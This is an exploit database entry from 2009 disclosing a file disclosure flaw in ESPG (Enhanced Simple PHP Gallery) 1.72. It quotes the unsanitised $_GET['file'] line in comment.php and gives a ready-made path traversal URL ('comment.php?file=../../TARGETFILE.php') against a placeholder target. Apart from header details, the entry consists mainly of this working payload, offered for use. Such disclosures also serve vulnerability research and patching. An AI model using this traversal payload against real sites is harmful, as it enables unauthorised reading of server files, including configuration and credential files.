ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure

EDB-ID:

7819


Author:

bd0rk

Type:

webapps


Platform:

PHP

Date:

2009-01-18


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

    
                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

# milw0rm.com [2009-01-18]